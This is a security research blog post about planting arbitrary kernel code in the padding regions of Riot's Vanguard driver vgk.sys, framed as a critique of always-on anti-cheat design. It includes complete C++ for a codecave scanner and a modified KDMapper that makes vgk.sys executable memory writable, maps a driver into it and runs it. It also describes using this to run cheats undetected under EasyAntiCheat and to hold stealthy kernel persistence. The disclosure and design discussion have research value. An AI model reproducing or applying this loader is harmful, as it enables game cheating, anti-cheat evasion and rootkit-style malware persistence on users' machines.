← Back

Leveraging Vanguard's Architecture

February 15, 2026
vanguardkernelpersistencevulnerability

Introduction

A few weeks ago I stumbled across something interesting while poking around Vanguard's driver architecture. Riot Games' anti-cheat contains a surprising amount of unused executable space that can be exploited for arbitrary code execution - way more than the typical 2 KB you'd find in most kernel drivers.

This article documents an interesting persistence primitive and discusses its architectural implications. It's not a deep technical analysis of Vanguard's internals - if you're looking for that level of detail, check out my EasyAntiCheat reversal work instead. This is more "here's something weird I found, here's proof it works, here's why it matters from a security architecture perspective."

Methodology & Scope

Before diving in, I want to be transparent about what this research actually covers versus what it doesn't.

What I Actually Did: PE structure analysis of vgk.sys using standard binary analysis tools, enumerated slack space across all sections with exact sizes and locations, built a modified KDMapper to allocate code inside vgk.sys .text section codecaves, tested execution from vgk.sys address space against EasyAntiCheat in live Fortnite sessions, verified the primitive works for persistence as long as Valorant isn't launched and used vgk's DriverObject structure for IOCTL hijacking.

What I Didn't Do: Reverse engineer Vanguard's VM infrastructure or obfuscation mechanisms, analyze how their integrity checks work internally, deep dive into why these codecaves exist or what Vanguard might use them for, examine their infamous PatchGuard workaround or other mechanisms Vanguard employs.

The technical findings about slack space locations and sizes are concrete and verifiable. The claims about how integrity checks work are based on observed behavior through testing - specifically that mapped code executes without detection until Valorant launches, at which point detection occurs. The architectural security implications are theory informed by general kernel security knowledge, not Vanguard-specific reversal.

Background on Vanguard

For those unfamiliar, Vanguard is Riot Games' kernel-mode anti-cheat system used primarily for Valorant. It runs as a boot-start driver with extensive virtualization and obfuscation throughout its codebase. Vanguard is known for its deep system integration, running continuously from boot regardless of whether Valorant is actually active.

Their architecture is genuinely innovative, specifically their use of kernel hooks like SwapContext, which gives them incredible visibility and power over the OS. However, this design choice is exactly what makes the primitive I'm discussing particularly interesting from a persistence perspective, because you're not just affecting people who are actively playing Valorant - you're affecting anyone who has it installed, period.

The Discovery: Slack Space Analysis

During basic reconnaissance of vgk.sys, I performed PE structure analysis to understand its binary layout. The results were immediately interesting and honestly kind of surprising.

Total Slack Space Breakdown:

Total slack space across all sections: ~221 KB

.nt section (RVA 0xb7000):
- Size: 16 KB
- Permissions: RW (not executable)
- Content: Entirely null bytes
- Purpose: Runtime storage

.text section (RX):
- Total slack space: ~127 KB
- Distribution: 366 separate regions
- Padding patterns: 0x00 or 0xCC bytes
- Largest contiguous region: ~13 KB

This is a massive amount compared to what you typically see in kernel drivers. For context, most drivers have maybe 2-4 KB of alignment padding at most. The predictable padding patterns (null bytes and int3 breakpoints) make these regions straightforward injection targets.

How the Primitive Works

Here's what I observed through testing: Vanguard runs 24/7 from boot, but based on my testing, integrity checks appear to only trigger when you launch a Vanguard-protected game like Valorant.

This suggests Vanguard defers integrity validation until game launch, though without reversing their actual implementation I can't confirm the exact mechanism. What I can confirm is that in my testing, mapped code in vgk.sys slack space executed without detection for extended periods as long as Valorant never launched.

Implementation Details

The core modification to KDMapper involves replacing the standard pool allocation with codecave targeting in vgk.sys. Here's the actual implementation from my proof of concept:

Codecave Scanner:

ULONG64 FindCodeCave(ULONG64 module_base, const char* section_name, ULONG64 min_size) {
    BYTE header_buffer[0x1000];
    if (!intel_driver::ReadMemory(module_base, header_buffer, sizeof(header_buffer))) {
        return 0;
    }

    auto dos = (PIMAGE_DOS_HEADER)header_buffer;
    auto nt = (PIMAGE_NT_HEADERS64)(header_buffer + dos->e_lfanew);
    auto sections = IMAGE_FIRST_SECTION(nt);

    for (int i = 0; i < nt->FileHeader.NumberOfSections; i++) {
        if (strcmp((char*)sections[i].Name, section_name) != 0)
            continue;

        ULONG64 section_start = module_base + sections[i].VirtualAddress;
        ULONG64 section_size = sections[i].Misc.VirtualSize;

        BYTE* section_data = new BYTE[section_size];
        if (!intel_driver::ReadMemory(section_start, section_data, section_size)) {
            delete[] section_data;
            return 0;
        }

        ULONG64 cave_start = 0, cave_len = 0;
        ULONG64 best_cave = 0, best_size = 0;

        for (ULONG64 j = 0; j < section_size; j++) {
            if (section_data[j] == 0x00 || section_data[j] == 0xCC) {
                if (cave_len == 0) cave_start = j;
                cave_len++;
            } else {
                if (cave_len > best_size) {
                    best_cave = cave_start;
                    best_size = cave_len;
                }
                cave_len = 0;
            }
        }

        if (cave_len > best_size) {
            best_cave = cave_start;
            best_size = cave_len;
        }

        delete[] section_data;

        if (best_size >= min_size) {
            return section_start + best_cave;
        }
        break;
    }

    return 0;
}

Modified MapDriver Function:

ULONG64 kdmapper::MapDriver(BYTE* data, ULONG64 param1, ULONG64 param2, 
                           bool free, bool destroyHeader, AllocationMode mode,
                           bool PassAllocationAddressAsFirstParam, 
                           mapCallback callback, NTSTATUS* exitCode) {
    
    const PIMAGE_NT_HEADERS64 nt_headers = portable_executable::GetNtHeaders(data);
    if (!nt_headers || nt_headers->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC) {
        return 0;
    }

    ULONG32 actual_size = 0;
    const PIMAGE_SECTION_HEADER sections = IMAGE_FIRST_SECTION(nt_headers);
    for (int i = 0; i < nt_headers->FileHeader.NumberOfSections; i++) {
        ULONG32 section_end = sections[i].VirtualAddress + sections[i].SizeOfRawData;
        if (section_end > actual_size) {
            actual_size = section_end;
        }
    }

    ULONG32 image_size = (actual_size + 0x1FF) & ~0x1FF;

    ULONG64 target_base = utils::GetKernelModuleAddress("vgk.sys");
    if (!target_base) {
        return 0;
    }

    ULONG64 cave_base = FindCodeCave(target_base, ".text", image_size);
    if (!cave_base) {
        return 0;
    }

    BYTE header_buffer[0x1000];
    intel_driver::ReadMemory(target_base, header_buffer, sizeof(header_buffer));
    
    auto dos = (PIMAGE_DOS_HEADER)header_buffer;
    auto nt = (PIMAGE_NT_HEADERS64)(header_buffer + dos->e_lfanew);
    auto host_sections = IMAGE_FIRST_SECTION(nt);

    ULONG64 text_base = 0, text_size = 0;
    for (int i = 0; i < nt->FileHeader.NumberOfSections; i++) {
        if (strcmp((char*)host_sections[i].Name, ".text") == 0) {
            text_base = target_base + host_sections[i].VirtualAddress;
            text_size = host_sections[i].Misc.VirtualSize;
            break;
        }
    }

    void* local_image_base = VirtualAlloc(nullptr, image_size, 
                                          MEM_RESERVE | MEM_COMMIT, 
                                          PAGE_READWRITE);

    memcpy(local_image_base, data, nt_headers->OptionalHeader.SizeOfHeaders);

    for (int i = 0; i < nt_headers->FileHeader.NumberOfSections; i++) {
        if (sections[i].Characteristics & IMAGE_SCN_CNT_UNINITIALIZED_DATA)
            continue;

        void* local_section = (void*)((ULONG64)local_image_base + sections[i].VirtualAddress);
        memcpy(local_section, (void*)((ULONG64)data + sections[i].PointerToRawData), 
               sections[i].SizeOfRawData);
    }

    RelocateImageByDelta(portable_executable::GetRelocs(local_image_base), 
                        cave_base - nt_headers->OptionalHeader.ImageBase);

    FixSecurityCookie(local_image_base, cave_base);
    ResolveImports(portable_executable::GetImports(local_image_base));

    intel_driver::MmSetPageProtection(text_base, text_size, PAGE_EXECUTE_READWRITE);
    intel_driver::WriteMemory(cave_base, local_image_base, image_size);

    const ULONG64 entry_point = cave_base + nt_headers->OptionalHeader.AddressOfEntryPoint;

    if (callback) {
        callback(¶m1, ¶m2, cave_base, image_size);
    }

    NTSTATUS status = 0;
    intel_driver::CallKernelFunction(&status, entry_point,
                                    (PassAllocationAddressAsFirstParam ? cave_base : param1), 
                                    param2);

    if (exitCode) *exitCode = status;

    intel_driver::MmSetPageProtection(text_base, text_size, PAGE_EXECUTE_READ);

    VirtualFree(local_image_base, 0, MEM_RELEASE);
    return cave_base;
}

The key differences from standard KDMapper: Instead of AllocatePool(), we use FindCodeCave() to locate suitable space in vgk.sys .text. We temporarily flip vgk.sys .text to RWX, write our driver, then restore to RX. The driver remains in the codecave indefinitely - we don't free it since we didn't allocate it.

This works because vgk.sys .text contains enough padding for most drivers, and the padding patterns (0x00/0xCC) are predictable across versions.

Since you're allocating in .text (RX), you cannot have global variables. All state must be stack-based or dynamically allocated elsewhere. This primitive requires writing to executable memory, which HVCI prevents. You'd need to either disable HVCI, find a HVCI bypass / workaround, or use this only on non-HVCI systems. The code must be mapped before Valorant launches - once Valorant starts, Vanguard's integrity checks will detect modifications.

Why This Evades AC's

EAC's typical execution detection vectors all fail against this primitive, and unbacked memory detection via NMI's or stack walking fails because code is backed by vgk.sys. You might think they can just compare to the disk version, but that is explained down below.

The Trust Amplification Angle

Since vgk.sys is a legitimately signed driver from Riot Games running as boot-start, it's inherently trusted by the operating system in ways that matter for evasion. Security products have extremely limited visibility into its behavior without potentially breaking legitimate functionality. Most AV/EDR vendors probably don't want to risk breaking Valorant for millions of users by being too aggressive with scanning Riot's driver.

Vanguard's deep system presence actually works in an attacker's favor here. Unusual kernel-level behavior originating from vgk.sys isn't particularly surprising to security products because Vanguard already performs highly privileged kernel operations normally. This means you can get away with things that would immediately trigger alerts if they came from even a less well-known signed driver. It's basically a post-compromise trust amplification vector where an attacker with any kernel write primitive can leverage Vanguard's legitimacy to evade detection across the entire security stack.

The kernel write primitive is obviously a prerequisite here - you need something like a vulnerable signed driver or any other method of writing to kernel memory. This does not support HVCI unless using something like ZeroHVCI as you need to flip permissions to write, so the only real way to get away with this is through modifying something like KDMapper. But once you have that primitive, using Vanguard as your execution host is way more effective than trying to load your own driver or allocate new memory regions that will immediately look suspicious.

Cross-Anticheat Evasion

Here's the interesting architectural paradox: This technique works incredibly well for games protected by anti-cheat systems other than Vanguard itself, like EasyAntiCheat or BattlEye. Vanguard's invasive kernel presence and signed status makes it the perfect evasion platform for attacking their competitors' security solutions. You're literally using Riot's anti-cheat to bypass other companies' anti-cheats.

Consider the scenario: System has Vanguard installed for Valorant, vgk.sys loaded at boot. The user wants to cheat in Fortnite which is protected by EasyAntiCheat, and the user never plays Valorant anymore. So they map their cheat driver into vgk.sys codecave, launch Fortnite and EAC loads and scans system, EAC sees vgk.sys popping up on stackwalks and trusts it as a legitimate driver, cheat executes from vgk.sys address space undetected, user never launches Valorant so Vanguard integrity checks never run.

This works because EAC can't aggressively scan vgk.sys .text without a risk since they don't know what this huge codecave could be used for during runtime. vgk.sys is expected to do privileged kernel operations, so the behavioral profile is indistinguishable from legitimate Vanguard activity. There's no cross-vendor cooperation that would allow EAC to know vgk's internal structure.

The Detection Problem

Detection from Vanguard's perspective is theoretically straightforward - they could hash their .text section and compare it periodically, or maintain a known-good copy for comparison. Whether they actually do this at game launch, I can't confirm without reversing their integrity check implementation. Based on Riot's response classifying this as not a security issue, they're likely either already detecting it at game launch and have determined it's outside their threat model since the user has already compromised their own kernel, or are aware but deferring implementation.

From competing anticheat perspective like EAC or BattlEye, this is where it gets way more complicated. They would need to implement checks that specifically target Vanguard's driver structure. They'd need to monitor every Vanguard release, extract and hash each version's .text section, maintain a massive version database, and update their own driver with new signatures constantly.

The obfuscation problem makes this even harder. Vanguard obfuscates everything, so a simple on-disk vs in-memory comparison won't work, since they cannot know why Vanguard has this region full of null bytes. EAC has no way to know what's legitimate Vanguard behavior versus malicious without deep Vanguard reversal.

Every Vanguard update breaks detection. New .text layout means EAC's hash database is outdated, requiring emergency patches rolled out to millions of users. This could be weekly, and there are also business and legal concerns - Could Riot claim interference with their anti-tamper?

The reality is that implementing detection for this would be time-consuming (weeks or months of engineering), fragile (breaks on every Vanguard update), potentially controversial from business and legal perspectives, high maintenance (ongoing updates required), and low ROI since it affects only users with both Vanguard and the skill to exploit this.

It's a highly unconventional technique because it works not due to technical sophistication but because of the awkward position it puts competing products in.

Architectural Analysis

The persistence model here is genuinely interesting. You're running from a boot-start driver that's always present. Your code sits dormant in slack space until needed. You have IOCTL communication handed to you. As long as you never launch a Vanguard-protected game, their integrity checks never examine your modifications. It's perfect for long-term persistence against anti-cheats that focus on runtime detection of actively executing code.

This primitive exists not because of a bug or oversight, but because of fundamental architectural decisions. Running from boot establishes a secure chain of trust before cheats can load, but creates an always-present attack surface even when the game isn't running. Only checking integrity at game launch reduces performance impact when game isn't active, but creates an exploitation window between boot and game launch. Using a boot-start driver that's always present can detect and prevent early-boot cheats, but attackers can leverage that presence for operations unrelated to your game.

None of these decisions are inherently wrong in isolation. Running from boot to establish a secure chain of trust is a massive leap forward in stopping traditional cheats. The problem is the combination creates this exploitable primitive.

Should anti-cheat software that protects a single game be running 24/7 in kernel mode on millions of machines? Consider a user who plays Valorant 2 hours per day - vgk.sys is protecting Valorant for 2 hours, doing nothing useful for 22 hours, but providing attack surface for 24 hours. A user who played Valorant once and uninstalled the game but not Vanguard has vgk.sys protecting nothing for 24 hours while providing attack surface for 24 hours. An active Valorant player who also plays other games has vgk.sys protecting Valorant for 2 hours, potentially being weaponized against other games for 4 hours, idle for 18 hours, but providing attack surface for 24 hours.

Conclusion

I want to note that Vanguard's architecture is genuinely strong and innovative. Running from boot to establish a secure chain of trust is a massive leap forward in stopping traditional cheats before they load. Their technical implementation is impressive.

However, this article highlights the double-edged sword of that innovation: when you create a continuously running, highly trusted kernel module, you inadvertently create a prime host for advanced persistence.

This is just another example of how trust assumptions in kernel drivers can be abused when you think about the threat model holistically. The technique itself isn't revolutionary or particularly clever - finding codecaves in drivers is old news. What's interesting is the architectural decisions that make it possible, the industry dynamics that make detection unlikely, and the broader security implications affecting millions of users with persistent kernel attack surface for malware potential completely unrelated to game cheating, including users who don't even play the game anymore.

"Protecting game integrity" and "protecting user security" are not the same goal and sometimes they're actively in tension with each other.

Riot's bug bounty program rightfully classifies this as not a Valorant security issue - from their threat model perspective, if an attacker has kernel write, the game is already compromised. But from a broader system security perspective, the fact that this primitive exists and affects millions of non-Valorant contexts matters.

As an industry, we need to start thinking more critically about the downstream security consequences of running invasive kernel-mode software 24/7, whether game anti-cheat really needs kernel persistence when the game isn't running, how we design trust boundaries in kernel drivers, and cross-vendor security cooperation versus competition.

Hopefully this case study contributes to that broader conversation. We can do better than this as an industry.

If you're a security researcher or anti-cheat developer interested in discussing these architectural concerns further, feel free to reach out. I'm always happy to talk about defensive techniques and better design patterns for kernel-mode security software.